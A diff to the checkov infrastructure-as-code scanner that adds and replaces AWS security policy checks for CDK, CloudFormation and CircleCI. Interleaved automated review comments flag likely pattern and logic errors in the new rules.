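Review bot: RedshiftClusterLogging.yaml uses the snake_case key `logging_properties` while the rest of this page and CDK's TypeScript API use camelCase, so the not_pattern would not recognise a cluster that does configure logging and every cluster would be reported. The not_pattern is also unusually literal — `$FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, }` expects a type-annotated object literal inline in the constructor call, which ordinary code written as `loggingProperties: { bucketName: ... }` would not satisfy; a pattern of the form `'new $FUNC(, loggingProperties: $PROPS ,)'` with a condition on `$PROPS` would be more robust. RedshiftClusterPubliclyAccessible.yaml flags only an explicit `publiclyAccessible: true`, which is the right polarity provided the flag is off when omitted.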
@@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_372 + name: Ensure Redshift is not deployed outside of a VPC + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $FUNC(, clusterSubnetGroupName: $ARG ,)' + - pattern: new $REDSHIFT.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $REDSHIFT.$FUNC(, clusterSubnetGroupName: $ARG ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml new file mode 100644 index 00000000000..209318c4ad3 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_373 + name: Ensure S3 bucket has block public ACLS enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, blockPublicAcls: true ,)' + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $S3.$FUNC(, blockPublicAcls: true ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml new file mode 100644 index 00000000000..a53903283f8 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml 
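Review bot: RedshiftInEc2ClassicMode.yaml matches `$FUNC` against `(?i)(CfnCluster|Cluster|ClusterProps)` and requires `clusterSubnetGroupName` on every match, but that key is an L1 (CfnCluster) property; the L2 `Cluster` construct is placed in a VPC through its `vpc` prop instead, so every L2 cluster would be reported. Either drop `Cluster` from the regex or add a second not_pattern for the L2 form, `'new $FUNC(, vpc: $VPC ,)'`. The same L1/L2 mismatch applies to S3BlockPublicACLs.yaml, where `blockPublicAcls: true` is a key nested under CfnBucket's `publicAccessBlockConfiguration` rather than a direct prop of `Bucket`, whose equivalent is `blockPublicAccess: BlockPublicAccess.BLOCK_ACLS` (already recognised by S3BucketPublicAccessBlock.yaml further down); confirm how the `, ... ,` ellipsis treats nested object keys before relying on it.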
@@ -0,0 +1,33 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_374 + name: Ensure S3 bucket has block public policy enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - patterns: + or: + - not_pattern: | + 'new $FUNC(, publicReadAccess: false ,)' + - not_pattern: | + "new $FUNC(, accessControl: 'Private' ,)" + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - patterns: + or: + - not_pattern: | + 'new $S3.$FUNC(, publicReadAccess: false ,)' + - not_pattern: | + "new $S3.$FUNC(, accessControl: 'Private' ,)" \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml new file mode 100644 index 00000000000..b3c7155e777 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml @@ -0,0 +1,30 @@ +metadata: + version: 0.2 + id: CKV_AWS_375 + name: Ensure all data stored in the S3 bucket is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)(BucketEncryption.KMS_MANAGED|BucketEncryption.S3_MANAGED|BucketEncryption.KMS) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)($S3.BucketEncryption.KMS_MANAGED|$S3.BucketEncryption.S3_MANAGED|$S3.BucketEncryption.KMS) \ No newline at end of file 
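Review bot: In S3BlockPublicPolicy.yaml the `patterns: or:` of two not_patterns reports a bucket that lacks either `publicReadAccess: false` or `accessControl: 'Private'`, i.e. both must be present to pass; if the intent is to pass when at least one is set, the combinator should be `and`. In S3BucketEncryption.yaml the second branch matches `new $S3.$FUNC()` but its not_pattern is `'new $FUNC(, encryption: $METHOD ,)'` without the `$S3.` prefix, so a namespaced `new s3.Bucket({ encryption: ... })` is never excluded and is always reported; compare S3BucketPublicAccessBlock.yaml, which prefixes both. The same dropped prefix appears in the second branch of S3BucketKMSEncryption.yaml and S3BucketLogging.yaml. S3BucketEncryption.yaml also omits `approach: define failing`, which the RDS and Redshift checks set — worth confirming the default approach is the same.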
diff --git a/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml new file mode 100644 index 00000000000..930a83fc60e --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml @@ -0,0 +1,29 @@ +metadata: + version: 0.2 + id: CKV_AWS_376 + name: Ensure that S3 buckets are encrypted with KMS by default + category: ENCRYPTION +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)(aws_cdk.aws_s3.BucketEncryption.KMS_MANAGED|aws_cdk.aws_s3.BucketEncryption.KMS) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)(aws_cdk.aws_s3.BucketEncryption.KMS_MANAGED|aws_cdk.aws_s3.BucketEncryption.KMS) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketLogging.yaml b/checkov/cdk/checks/typescript/S3BucketLogging.yaml new file mode 100644 index 00000000000..cdd8dc0ec01 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketLogging.yaml 
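Review bot: The `$METHOD` regex in S3BucketKMSEncryption.yaml, `(?i)(aws_cdk.aws_s3.BucketEncryption.KMS_MANAGED|aws_cdk.aws_s3.BucketEncryption.KMS)`, is written with the Python module path, but the check is scoped to `javascript`/`typescript`, where the value appears as `BucketEncryption.KMS` or `s3.BucketEncryption.KMS` (the forms S3BucketEncryption.yaml on this page already uses); as written no TypeScript bucket can satisfy the not_pattern, so every bucket is reported. The unescaped `.` in the regex also matches any character, and `metadata` lacks the `framework: cdk` field most of the other new checks carry.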
@@ -0,0 +1,29 @@ +metadata: + version: 0.2 + id: CKV_AWS_377 + name: Ensure the S3 bucket has access logging enabled + category: LOGGING +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, serverAccessLogsBucket: $BUCKET.$LOGGER() ,)' + conditions: + - metavariable: $LOGGER + regex: (?i)(fromBucketArn|fromBucketAttributes|fromBucketName|fromBucketRegionalAttributes|fromBucketUrl) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, serverAccessLogsBucket: $S3.$BUCKET.$LOGGER() ,)' + conditions: + - metavariable: $LOGGER + regex: (?i)(fromBucketArn|fromBucketAttributes|fromBucketName|fromBucketRegionalAttributes|fromBucketUrl) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml new file mode 100644 index 00000000000..fd23f6e97a8 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml @@ -0,0 +1,30 @@ +metadata: + version: 0.2 + id: CKV_AWS_378 + name: Ensure that S3 bucket has a Public Access block + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, blockPublicAccess: BlockPublicAccess.$ATR ,)' + conditions: + - metavariable: $ATR + regex: (?i)(BLOCK_ALL|BLOCK_ACLS|BLOCK_POLICY|RESTRICTED) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $S3.$FUNC(, blockPublicAccess: $S3.BlockPublicAccess.$ATR ,)' + conditions: + - metavariable: $ATR + regex: (?i)(BLOCK_ALL|BLOCK_ACLS|BLOCK_POLICY|RESTRICTED) 
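Review bot: S3BucketLogging.yaml only excludes buckets whose `serverAccessLogsBucket` is an import call matched by `$BUCKET.$LOGGER()` with `$LOGGER` in `(fromBucketArn|…|fromBucketUrl)`; the common case of passing a bucket object created in the same stack (`serverAccessLogsBucket: logBucket`) is not excluded and is reported as missing logging. A not_pattern with a free value, `'new $FUNC(, serverAccessLogsBucket: $BUCKET ,)'`, covers both, as the deleted legacy S3BucketLogging.yaml did with `$ANY_VAR`. `metadata` here also lacks `framework: cdk`. S3BucketPublicAccessBlock.yaml looks consistent with its legacy counterpart, with the narrower `$ATR` regex a reasonable tightening.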
diff --git a/checkov/cdk/checks/typescript/S3BucketVersioning.yaml b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml new file mode 100644 index 00000000000..5fea1f3bc41 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml @@ -0,0 +1,24 @@ +metadata: + version: 0.2 + id: CKV_AWS_379 + name: Ensure all data stored in the S3 bucket have versioning enabled + category: BACKUP_AND_RECOVERY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, versioned: true ,)' + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $S3.$FUNC(, versioned: true ,)' diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketEncryption.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketEncryption.yaml deleted file mode 100644 index 72629895e79..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketEncryption.yaml +++ /dev/null 
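Review bot: The new S3 checks are registered under fresh IDs (`CKV_AWS_375`–`CKV_AWS_379`) while the legacy definitions they replace, deleted just below, carried `CKV_AWS_19`, `CKV_AWS_145`, `CKV_AWS_18`, `CKV2_AWS_6` and `CKV_AWS_21`, which appear to be the IDs these same checks keep in checkov's other frameworks. Existing suppressions, `--skip-check` lists and platform policy mappings keyed on the old IDs stop applying to CDK TypeScript, and a bucket can be reported twice under different IDs where another framework scans the same stack. Unless the renumbering is deliberate, keeping the legacy IDs would preserve continuity; if it is deliberate, the changelog should state the old-to-new mapping.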
@@ -1,47 +0,0 @@ -metadata: - version: 0.1 - id: CKV_AWS_19 - name: Ensure all data stored in the S3 bucket is securely encrypted at rest - category: ENCRYPTION -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)" - - cond_type: pattern - operator: equals - value: "new Bucket(..., {..., encryption: BucketEncryption.UNENCRYPTED, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)" - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.UNENCRYPTED, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketKMSEncryption.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketKMSEncryption.yaml deleted file mode 100644 index 92b1dd0bf49..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketKMSEncryption.yaml +++ /dev/null 
@@ -1,57 +0,0 @@ -metadata: - version: 0.1 - id: CKV_AWS_145 - name: Ensure that S3 buckets are encrypted with KMS by default - category: ENCRYPTION -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)" - - and: - - cond_type: variable - variable: $ENCRYPTION - operator: regex_match - value: ^(S3_MANAGED|UNENCRYPTED)$ - - cond_type: pattern - operator: equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ENCRYPTION, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)" - - and: - - cond_type: variable - variable: $ENCRYPTION - operator: regex_match - value: ^(S3_MANAGED|UNENCRYPTED)$ - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ENCRYPTION, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketLogging.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketLogging.yaml deleted file mode 100644 index 702c8662e6b..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketLogging.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -metadata: - version: 0.1 - id: CKV_AWS_18 - name: Ensure the S3 bucket has access logging enabled - category: LOGGING -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketPublicAccessBlock.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketPublicAccessBlock.yaml deleted file mode 100644 index e681a928245..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketPublicAccessBlock.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -metadata: - version: 0.1 - id: CKV2_AWS_6 - name: Ensure that S3 bucket has a Public Access block - category: NETWORKING -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketVersioning.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketVersioning.yaml deleted file mode 100644 index 0bad75c3468..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketVersioning.yaml +++ /dev/null @@ -1,37 +0,0 @@ -metadata: - version: '0.1' - id: CKV_AWS_21 - name: Ensure all data stored in the S3 bucket have versioning enabled - category: BACKUP_AND_RECOVERY -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., versioned: true, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., versioned: true, ...}, ...)" 
diff --git a/checkov/cdk/runner.py b/checkov/cdk/runner.py index 360f70c1a69..32c03c28096 100644 --- a/checkov/cdk/runner.py +++ b/checkov/cdk/runner.py @@ -35,6 +35,7 @@ def run( for lang in CDKLanguages.set(): self.cdk_langs.append(lang) + reports = super().run( root_folder=root_folder, external_checks_dir=external_checks_dir, diff --git a/checkov/circleci_pipelines/image_referencer/__init__.py b/checkov/circleci_pipelines/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/circleci_pipelines/image_referencer/manager.py b/checkov/circleci_pipelines/image_referencer/manager.py deleted file mode 100644 index 3b4dede972a..00000000000 --- a/checkov/circleci_pipelines/image_referencer/manager.py +++ /dev/null @@ -1,12 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager - - -class CircleCIImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None: - provider = CircleCIProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/circleci_pipelines/image_referencer/provider.py b/checkov/circleci_pipelines/image_referencer/provider.py deleted file mode 100644 index 04e37861811..00000000000 --- a/checkov/circleci_pipelines/image_referencer/provider.py +++ /dev/null 
@@ -1,50 +0,0 @@ -from __future__ import annotations - -from typing import Any, cast -import jmespath -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.common.util.consts import START_LINE, END_LINE -from checkov.yaml_doc.runner import Runner - - -class CircleCIProvider(WorkflowImageReferencerProvider): - __slots__ = ("workflow_config", "file_path") - - def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None: - super().__init__(workflow_config, file_path) - - def generate_resource_key(self, start_line: int, end_line: int, tag: str) -> str: - sub_name = Runner.resolve_sub_name(self.workflow_config, start_line, end_line, tag) - if not sub_name: # Failed to locate the resource in the config file - return '' - image_name = Runner.resolve_image_name(self.workflow_config[tag][sub_name], start_line, end_line) - new_key = f'{tag}({sub_name}).docker.image{image_name}' if sub_name else tag - return new_key - - def extract_images_from_workflow(self) -> list[Image]: - images: list[Image] = [] - - keywords = ( - ('jobs', "jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"), - ('executors', "executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"), - ) - for tag, keyword in keywords: - results = cast("list[dict[str, Any]]", jmespath.search(keyword, self.workflow_config)) - if not results: - continue - for result in results: - image_name = result.get("image") - if image_name: - resource_id = self.generate_resource_key(result[START_LINE], result[END_LINE], tag) - if resource_id: - images.append( - Image( - file_path=self.file_path, - name=image_name, - start_line=result[START_LINE], - end_line=result[END_LINE], - related_resource_id=resource_id, - ) - ) - return images 
diff --git a/checkov/circleci_pipelines/runner.py b/checkov/circleci_pipelines/runner.py index 438f5e76acc..5fe6eafe297 100644 --- a/checkov/circleci_pipelines/runner.py +++ b/checkov/circleci_pipelines/runner.py @@ -4,22 +4,18 @@ import os from typing import TYPE_CHECKING, Any, Iterable -from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.output.report import CheckType, Report from checkov.circleci_pipelines.registry import registry -from checkov.common.util.type_forcers import force_dict +from checkov.common.output.report import CheckType, Report from checkov.runner_filter import RunnerFilter from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry - from networkx import DiGraph WORKFLOW_DIRECTORY = "circleci" -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.CIRCLECI_PIPELINES # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: 
@@ -89,37 +85,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file_path, config in definitions.items(): - _config = force_dict(config) or {} - if not config: - continue - manager = CircleCIImageReferencerManager(workflow_config=_config, file_path=file_path) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml new file mode 100644 index 00000000000..b290a69deb8 --- /dev/null +++ b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml 
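Review bot: Dropping the image-referencer branch removes container-image scanning for CircleCI pipelines altogether: the removed code honoured `runner_filter.run_image_referencer` and appended an image report, and nothing in the new `run` replaces it, so users who relied on scanning `jobs.*.docker[].image` / `executors.*.docker[].image` silently lose that coverage. If this is intentional it should be called out in the changelog and docs; if a shared workflow image referencer now covers CircleCI, a one-line comment at the end of `run` pointing to it would save the next reader the search. With `extract_images` gone, `os` (used only in the removed `os.path.commonprefix` call as far as this diff shows) and possibly `Any` from the kept `from typing import TYPE_CHECKING, Any, Iterable` may now be unused — worth a lint pass. The enclosing `run` starts outside the hunk.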
@@ -0,0 +1,25 @@ +metadata: + id: "CKV2_AWS_68" + name: "Ensure SageMaker notebook instance IAM policy is not overly permissive" + category: "NETWORKING" + +definition: + and: + - cond_type: filter + value: + - AWS::SageMaker::NotebookInstance + operator: within + attribute: resource_type + - cond_type: connection + resource_types: + - AWS::SageMaker::NotebookInstance + connected_resource_types: + - AWS::IAM::Role + operator: exists + - cond_type: attribute + resource_types: + - AWS::IAM::Role + attribute: "AssumeRolePolicyDocument.Statement[?(@.Effect == Allow)].Action[*]" + operator: "jsonpath_not_equals" + value: "*" + diff --git a/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py new file mode 100644 index 00000000000..ac11a53234c --- /dev/null +++ b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py @@ -0,0 +1,28 @@ +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CognitoUnauthenticatedIdentities(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access" + id = "CKV_AWS_366" + supported_resources = ('AWS::Cognito::IdentityPool',) + categories = (CheckCategories.IAM,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED, + ) + + def get_expected_value(self) -> Any: + return False + + def get_inspected_key(self) -> str: + return 'Properties/AllowUnauthenticatedIdentities' + + +check = CognitoUnauthenticatedIdentities() 
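Review bot: The attribute condition in SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml inspects `AssumeRolePolicyDocument.Statement[?(@.Effect == Allow)].Action[*]`, i.e. the role's trust policy, whose Action is normally `sts:AssumeRole`; an overly permissive notebook role is usually a `*` Action in the permissions policies attached to the role (inline `Policies[*].PolicyDocument` on AWS::IAM::Role, or separate policy resources), which this check never examines, so it will pass almost every template. If the trust policy really is the target, the name should say so; otherwise the attribute should point at the policy documents and a further connection to attached policy resources may be needed. The file name says "AllTraffic" while the metadata name is about IAM permissiveness — one of the two should be aligned.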
diff --git a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py index 39a5a1a0f31..6bddcecb7a1 100644 --- a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py +++ b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py @@ -23,7 +23,8 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: """ properties = conf. get("Properties") if properties and isinstance(properties, dict): - if "TransitEncryptionEnabled" in properties.keys() and "AuthToken" in properties.keys(): + if "TransitEncryptionEnabled" in properties.keys() and ("AuthToken" in properties.keys() or + "UserGroupIds" in properties.keys()): if conf["Properties"]["TransitEncryptionEnabled"]: return CheckResult.PASSED return CheckResult.FAILED diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py new file mode 100644 index 00000000000..daf78957202 --- /dev/null +++ b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py 
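Review bot: The new condition only tests key presence, so `UserGroupIds: []` (or an empty `AuthToken`) satisfies it and, with `TransitEncryptionEnabled: true`, the replication group passes although no client authentication is configured. Testing the values instead, `if properties.get("TransitEncryptionEnabled") and (properties.get("AuthToken") or properties.get("UserGroupIds")):`, keeps the intent, and also drops the redundant `.keys()` lookups and the re-read through `conf["Properties"]`. The enclosing `scan_resource_conf` starts outside the hunk.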
@@ -0,0 +1,26 @@ +from typing import List + +from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories + + +class SagemakerNotebookEncryptedWithCMK(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)" + id = "CKV_AWS_187" + supported_resources = ("AWS::SageMaker::NotebookInstance", "AWS::SageMaker::Domain") + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return 'Properties/KmsKeyId' + + def get_expected_value(self): + return ANY_VALUE + + def get_evaluated_keys(self) -> List[str]: + return ['Properties/KmsKeyId'] + + +check = SagemakerNotebookEncryptedWithCMK() diff --git a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py index 173c258cde8..385f52ea6e7 100644 --- a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py @@ -23,6 +23,7 @@ # service-provider::service-name::data-type-name CFN_RESOURCE_TYPE_IDENTIFIER = re.compile(r"^[a-zA-Z0-9]+::[a-zA-Z0-9]+::[a-zA-Z0-9]+$") SAST_CATEGORY = 'Sast' +LICENSES_CATEGORY = 'Licenses' class CustomPoliciesIntegration(BaseIntegrationFeature): 
